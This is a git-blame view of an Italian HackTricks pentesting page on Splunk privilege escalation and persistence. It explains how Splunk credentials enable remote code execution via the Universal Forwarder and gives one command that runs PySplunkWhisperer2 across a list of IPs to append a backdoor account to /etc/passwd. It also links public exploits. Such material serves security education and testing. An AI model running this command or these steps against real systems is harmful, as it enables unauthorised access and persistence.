Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-22 20:53:37 +00:00
Code Issues Projects Releases Packages Wiki Activity
hacktricks/linux-hardening/privilege-escalation/splunk-lpe-and-persistence.md

74 lines
5 KiB
Markdown
Raw Normal View History

Translated to Italian
2024-02-10 13:03:23 +00:00
# Splunk LPE e Persistenza
Ad hacktricks sponsoring
2022-04-28 16:01:33 +00:00
Translated ['linux-hardening/privilege-escalation/docker-security/authz-
2024-07-29 08:42:21 +00:00
{% hint style="success" %}
Impara e pratica il hacking AWS:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Impara e pratica il hacking GCP: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
Ad hacktricks sponsoring
2022-04-28 16:01:33 +00:00
Translated ['linux-hardening/privilege-escalation/docker-security/authz-
2024-07-29 08:42:21 +00:00
<details>
Ad hacktricks sponsoring
2022-04-28 16:01:33 +00:00
Translated ['linux-hardening/privilege-escalation/docker-security/authz-
2024-07-29 08:42:21 +00:00
<summary>Supporta HackTricks</summary>
arte
2023-12-30 20:49:49 +00:00
Translated ['linux-hardening/privilege-escalation/docker-security/authz-
2024-07-29 08:42:21 +00:00
* Controlla i [**piani di abbonamento**](https://github.com/sponsors/carlospolop)!
* **Unisciti al** 💬 [**gruppo Discord**](https://discord.gg/hRep4RUj7f) o al [**gruppo telegram**](https://t.me/peass) o **seguici** su **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Condividi trucchi di hacking inviando PR ai** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos su github.
Ad hacktricks sponsoring
2022-04-28 16:01:33 +00:00
</details>
Translated ['crypto-and-stego/cryptographic-algorithms/unpacking-binarie
2024-07-19 04:52:42 +00:00
{% endhint %}
Ad hacktricks sponsoring
2022-04-28 16:01:33 +00:00
Translated ['crypto-and-stego/cryptographic-algorithms/unpacking-binarie
2024-07-19 04:52:42 +00:00
Se **enumerando** una macchina **internamente** o **esternamente** trovi **Splunk in esecuzione** (porta 8090), se per fortuna conosci delle **credenziali valide** puoi **sfruttare il servizio Splunk** per **eseguire una shell** come l'utente che esegue Splunk. Se è in esecuzione come root, puoi elevare i privilegi a root.
GitBook: [master] 2 pages modified
2020-11-06 00:30:40 +00:00
Translated ['linux-hardening/privilege-escalation/docker-security/authz-
2024-07-29 08:42:21 +00:00
Inoltre, se sei **già root e il servizio Splunk non ascolta solo su localhost**, puoi **rubare** il file **della password** **dal** servizio Splunk e **crackare** le password, o **aggiungere nuove** credenziali ad esso. E mantenere la persistenza sull'host.
GitBook: [master] 2 pages modified
2020-11-06 00:30:40 +00:00
Translated to Italian
2024-02-10 13:03:23 +00:00
Nella prima immagine qui sotto puoi vedere come appare una pagina web di Splunkd.
GitBook: [master] 2 pages modified
2020-11-06 00:30:40 +00:00
Translated ['crypto-and-stego/cryptographic-algorithms/unpacking-binarie
2024-07-19 04:52:42 +00:00
## Riepilogo dell'Exploit dell'Agente Splunk Universal Forwarder
GitBook: [master] 2 pages modified
2020-11-06 00:30:40 +00:00
Translated ['crypto-and-stego/cryptographic-algorithms/unpacking-binarie
2024-07-19 04:52:42 +00:00
Per ulteriori dettagli controlla il post [https://eapolsniper.github.io/2020/08/14/Abusing-Splunk-Forwarders-For-RCE-And-Persistence/](https://eapolsniper.github.io/2020/08/14/Abusing-Splunk-Forwarders-For-RCE-And-Persistence/). Questo è solo un riepilogo:
GitBook: [master] 2 pages modified
2020-11-06 00:30:40 +00:00
Translated ['crypto-and-stego/cryptographic-algorithms/unpacking-binarie
2024-07-19 04:52:42 +00:00
**Panoramica dell'Exploit:**
Translated ['linux-hardening/privilege-escalation/docker-security/authz-
2024-07-29 08:42:21 +00:00
Un exploit che prende di mira l'Agente Splunk Universal Forwarder (UF) consente agli attaccanti con la password dell'agente di eseguire codice arbitrario sui sistemi che eseguono l'agente, compromettendo potenzialmente un'intera rete.
GitBook: [master] 2 pages modified
2020-11-06 00:30:40 +00:00
Translated ['crypto-and-stego/cryptographic-algorithms/unpacking-binarie
2024-07-19 04:52:42 +00:00
**Punti Chiave:**
- L'agente UF non convalida le connessioni in arrivo o l'autenticità del codice, rendendolo vulnerabile all'esecuzione non autorizzata di codice.
- I metodi comuni per acquisire password includono la loro localizzazione in directory di rete, condivisioni di file o documentazione interna.
Translated ['linux-hardening/privilege-escalation/docker-security/authz-
2024-07-29 08:42:21 +00:00
- Un exploit riuscito può portare a accesso a livello SYSTEM o root su host compromessi, esfiltrazione di dati e ulteriore infiltrazione nella rete.
GitBook: [master] 2 pages modified
2020-11-06 00:30:40 +00:00
Translated ['crypto-and-stego/cryptographic-algorithms/unpacking-binarie
2024-07-19 04:52:42 +00:00
**Esecuzione dell'Exploit:**
Translated to Italian
2024-02-10 13:03:23 +00:00
1. L'attaccante ottiene la password dell'agente UF.
2. Utilizza l'API di Splunk per inviare comandi o script agli agenti.
Translated ['crypto-and-stego/cryptographic-algorithms/unpacking-binarie
2024-07-19 04:52:42 +00:00
3. Le azioni possibili includono estrazione di file, manipolazione di account utente e compromissione del sistema.
GitBook: [master] 2 pages modified
2020-11-06 00:30:40 +00:00
Translated to Italian
2024-02-10 13:03:23 +00:00
**Impatto:**
Translated ['linux-hardening/privilege-escalation/docker-security/authz-
2024-07-29 08:42:21 +00:00
- Compromissione completa della rete con permessi a livello SYSTEM/root su ogni host.
Translated ['crypto-and-stego/cryptographic-algorithms/unpacking-binarie
2024-07-19 04:52:42 +00:00
- Potenziale per disabilitare il logging per evitare il rilevamento.
Translated to Italian
2024-02-10 13:03:23 +00:00
- Installazione di backdoor o ransomware.
GitBook: [master] 2 pages modified
2020-11-06 00:30:40 +00:00
Translated ['crypto-and-stego/cryptographic-algorithms/unpacking-binarie
2024-07-19 04:52:42 +00:00
**Esempio di Comando per l'Exploitation:**
GitBook: [master] 2 pages modified
2020-11-06 00:30:40 +00:00
```bash
for i in `cat ip.txt`; do python PySplunkWhisperer2_remote.py --host $i --port 8089 --username admin --password "12345678" --payload "echo 'attacker007:x:1003:1003::/home/:/bin/bash' >> /etc/passwd" --lhost 192.168.42.51;done
```
Translated ['crypto-and-stego/cryptographic-algorithms/unpacking-binarie
2024-07-19 04:52:42 +00:00
**Sfruttamenti pubblici utilizzabili:**
GitBook: [master] 2 pages modified
2020-11-06 00:30:40 +00:00
* https://github.com/cnotin/SplunkWhisperer2/tree/master/PySplunkWhisperer2
* https://www.exploit-db.com/exploits/46238
* https://www.exploit-db.com/exploits/46487
Ad hacktricks sponsoring
2022-04-28 16:01:33 +00:00
Translated ['crypto-and-stego/cryptographic-algorithms/unpacking-binarie
2024-07-19 04:52:42 +00:00
## Abusare delle query di Splunk
Ad hacktricks sponsoring
2022-04-28 16:01:33 +00:00
Translated ['crypto-and-stego/cryptographic-algorithms/unpacking-binarie
2024-07-19 04:52:42 +00:00
**Per ulteriori dettagli controlla il post [https://blog.hrncirik.net/cve-2023-46214-analysis](https://blog.hrncirik.net/cve-2023-46214-analysis)**
Ad hacktricks sponsoring
2022-04-28 16:01:33 +00:00
Translated ['linux-hardening/privilege-escalation/docker-security/authz-
2024-07-29 08:42:21 +00:00
{% hint style="success" %}
Impara e pratica il hacking AWS:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Impara e pratica il hacking GCP: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
Ad hacktricks sponsoring
2022-04-28 16:01:33 +00:00
Translated ['linux-hardening/privilege-escalation/docker-security/authz-
2024-07-29 08:42:21 +00:00
<details>
Ad hacktricks sponsoring
2022-04-28 16:01:33 +00:00
Translated ['linux-hardening/privilege-escalation/docker-security/authz-
2024-07-29 08:42:21 +00:00
<summary>Supporta HackTricks</summary>
Ad hacktricks sponsoring
2022-04-28 16:01:33 +00:00
Translated ['linux-hardening/privilege-escalation/docker-security/authz-
2024-07-29 08:42:21 +00:00
* Controlla i [**piani di abbonamento**](https://github.com/sponsors/carlospolop)!
* **Unisciti al** 💬 [**gruppo Discord**](https://discord.gg/hRep4RUj7f) o al [**gruppo telegram**](https://t.me/peass) o **seguici** su **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Condividi trucchi di hacking inviando PR ai** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos su github.
Ad hacktricks sponsoring
2022-04-28 16:01:33 +00:00
</details>
Translated ['crypto-and-stego/cryptographic-algorithms/unpacking-binarie
2024-07-19 04:52:42 +00:00
{% endhint %}
Reference in a new issue Copy permalink